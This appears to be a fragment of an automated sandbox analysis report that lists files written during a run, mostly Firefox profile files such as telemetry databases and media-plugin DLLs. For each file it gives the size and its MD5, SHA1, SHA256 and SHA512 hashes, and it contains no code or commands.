SHA18cd6866594759711ea1836e86a5b7ca64ee8911f
SHA25642aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA5129bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
7.3MB
MD529713ebba8304896f257a90d12389de0
SHA18d5553b1931d7b1138163b681c191ee7f681ac83
SHA25694196eb7588daa100a08d5075e5e03b4ae5bc05eaacf3d9ce77c84eaa3d1e9cd
SHA512de2249cd067258e7a7bdb7f23f4d459ef4f1be0433fef7f6d3317b93c968a792f6ae8a8a6b6eab272b8e5047d6ff4099e6bee10c565d3fea7b6245edfaa3ac83
-
Filesize
711B
MD5558659936250e03cc14b60ebf648aa09
SHA132f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA2562445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA5121632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727
-
Filesize
135KB
MD53f6f93c3dccd4a91c4eb25c7f6feb1c1
SHA19b73f46adfa1f4464929b408407e73d4535c6827
SHA25619f05352cb4c6e231c1c000b6c8b7e9edcc1e8082caf46fff16b239d32aa7c9e
SHA512d488fa67e3a29d0147e9eaf2eabc74d9a255f8470cf79a4aea60e3b3b5e48a3fcbc4fc3e9ce58dff8d7d0caa8ae749295f221e1fe1ba5d20deb2d97544a12ba4
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\AlternateServices.bin
Filesize8KB
MD571832e2101eb62f6c9b96efb476b98aa
SHA15b4084af6311030dade4472177aa25c009b269e6
SHA25655d0c594bbc7ff593bc19826cab2864b65426693ff551c62026d2a9e4bd8fea3
SHA512c9300b4316d09787566be6ab724368053a82f3fcbbc56f3a4aee73dfe4fa1df0e6d27c79e26a15d2c074f446ab8e8cd7f52f3d6b12ce1b2f9741aa46422dffdd
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp
Filesize25KB
MD5f03c417d4ab36e1c2f303a7be247b450
SHA14993d2b6d0ac510535dc94ff8213f26594f6b03e
SHA256e4213b652bf42ac5acf52be5f148f0cf36fa9187f14c99bba85be6985c76a519
SHA5127f6135c7ac4aa4e753534510851fac77e3ca70b81b67a918a93e1f156d6614a6c6dafc87cfee9d0a8d48e261b722ac710e65aa23b7d8d04fd2037a82dcf8ed6f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp
Filesize25KB
MD5bf842ea85c1ed3976bb703d4db08a7ba
SHA192714f514c954269987593dd5c4a419d7cd408a9
SHA2564a3fb55e34214f5a83f965f213981bc137ca32f94231099b327d0e9576d3d329
SHA51254d754b0037c8e1369cefb2ea9e7c015837f48effcf2194ea2252e08ea1ac0b7e409146abf88e98aac86bcb28086e2f0bd1c555108092f71f28a8dc951bc7ff2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp
Filesize22KB
MD54f8fe84d9c8f06bd14642ec1c82fb2c5
SHA17cb9fe4e89ca3cd63b5d4c2fd664ba28cab98372
SHA256c0820a63b9eff9535c1d958605af8b60b3d93237128ddc401104ae31a08f9aa5
SHA5128bbfbb751872fd44f456f3fd8e81abe7bc2c2471dd204c58cee511e28ad2ca588155d8b258228d9886e9ad7c9e1a6c267dabc67abb3bbb93511a97cdc4c15698
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp
Filesize21KB
MD57fcf0bd7d40624070a72db85977f26cf
SHA19db32fa16c90e020d918748ebc66eadb7d0910ce
SHA256f94794ea32f7044265978a28962f182f76a57bfaeeb767a29b3ebce288b39de3
SHA5126135935d5d62d1f71fa1033c22570f678b140a3160fe29f353805a146c02475035824051cecaa2bcde93885141bba2e4d544f63b4f37703b900a48dc2d5f315c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp
Filesize22KB
MD54a13c01d065c7dd13fb30781103b65f7
SHA13b06d17cc4c745307af57bbdb919369f8f654132
SHA2562e3948149219a5deeeb6a9e60fa09d612f054cee03e760c245dd1a78470e9e52
SHA5125df93b6d46a3ef3fb4eb990362f272a875c5b28562433c2f86a8c27150ffdcea12c3894ef175252ea28573d41ca31265f5a025269604c1f91fcd421bd8467bdc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\28a98a58-3e90-4867-968c-10633d81dc7f
Filesize659B
MD5c9c4af605a3161d862fb8f4f898752d0
SHA15464be5f4aa2f0fe4e32cb075cd2ddef9a1f3911
SHA256fe47218cfbb5126276c23f2eec2511f6690ddbf7d2b8dd1c6a0b7517b7db705a
SHA512438be0fc839b91cda98193a3d518ab85944694af9566aca038eef8075588da59bbb242e0085614f31b5d7f02096999d283c1b66c11678b1653af6a1ffeca53ac
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\2a77cb00-299e-44f2-afce-67765ae48807
Filesize982B
MD54fc84173b8b991e6cdb426915475a3e6
SHA1337e2a4d907eccfe3984ec1e56952c9c9ba07101
SHA2562cba5ae6f0a7b34fc8aee137de6304b7e9abc87a5df6fefcbb52f36e64807f85
SHA512cafed66b627fdf480eb5ef33a2b2e3c50bc028a5db2c945d303b68fe43fbf01941a33efa48de3df8a54b3938521deff58ed0ebe24fc0d29d6e6cf50389febde0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
15KB
MD51c3b1d868277e18355ecc5cbae8bf8be
SHA12089e838cb14d3e9568fd45be28b537ba52ae1de
SHA256979a29d11c826020546ae4f34f53a0937d5ee78a43052dc56f2b56f71851099d
SHA512239dfabf0c5539bbb82e7463827225837934b1f4ffa381d0185f863fe8d34ccdc3d4ae1c6d04e13a29f0132ad96071afbe3c96672a01e26fff072094781f8d27
-
Filesize
10KB
MD5597ade3d5e050190d515fb25ee53ada7
SHA1fc92151d583da3eaa0589fab08aea1604bfe3a06
SHA256954966f5a28fed99b368d30cd5ee9a47fd2f0f0e598ab8632f065fb4619cdce5
SHA5122c86056ac5ddf282e5a9dfa6c06ebe343f17f37369b0ac110e29113631812a60e22b631353ed55ba9786374802acccbd286798a46434709b3f59ccd7d017354b
-
Filesize
12KB
MD5374079ab6956584960e59c9c3ca799c5
SHA132fc6d869491b561dfe98d979c4167ce06deec5d
SHA25662bac948d55cc55eaed3df0bf6713bf8647133f547470b9c8d7887471d222be9
SHA5120ef87e6cd051795e09b38c49992282d5138945d7e2f06981f162f89b3302901cacfe8680298f68837e6d919801f26d75c7c3d36fce3a367e3cd96fdaefdad55e
-
Filesize
10KB
MD59cf5363920c992c54a56940ae0503b0b
SHA1ac8e1f017c65a9436db7f16dcbb81fd8b03ce241
SHA2564686a9109a1592f6e55348bea6c3198b40de257bbc8c78e8918b945be507366d
SHA512845e4e0b9273dbd86d91552ecaeb20597760b9f1e5c672348c99ac5a188db1148459247218c407eed74a2cd7a28733f28c0c9de5faf25c390fe796dbd0ede352
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize960KB
MD5142a4a9aa0f86f067c1029881d9ff57b
SHA1722569dd2f7c2d94adf33f8727d8f1486b2b6edd
SHA256e96f3a7ae67b1fe0ce3dd54ee9c5ef17b3171bb34736189e11b457a3e7b0163f
SHA512ac5c9ccc035375b85296aafc0fb7656a663c453268d4763afd7ea621b649006fac2c5da8667f65c6afcac28f589146f183cfdbbd5603fd4f8646bcc06d910cce
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize2.1MB
MD5acbff2c4f30a897b837ada9adca92975
SHA1500bf78ad01ee1538690860ea6e5472ff8bb423f
SHA256331c9dcc186bf4196dfd67dfbe07bdf7b9207de7ffd6241d13eeab626eeff429
SHA512d3a3b5819ba426c994e91ecba001065ced3e106ca7286e1fc8a5b3d61bab82d4fd766adcd0be9482056c88c327eb8ff4dd4d4e0d719fb7c1f636e71ccacd3624
-
Filesize
3.1MB
MD5920cebd96333afaab56b397b6f181ac2
SHA14dd699236016bf8eaf571c4714f40d31bd35510f
SHA25602cc9a1931ca1f4538aadcc093aac06c8a5851633b98d39304c58afd45c0feef
SHA512dafa7fcf6ae83b683d98854ee22b0c42881669010ff8aff848dd4bc33ec5eed82cb8bb51b78077468266fb9d1f2403deb6aa4ca37da9341e6f0cd9d8e5937cb7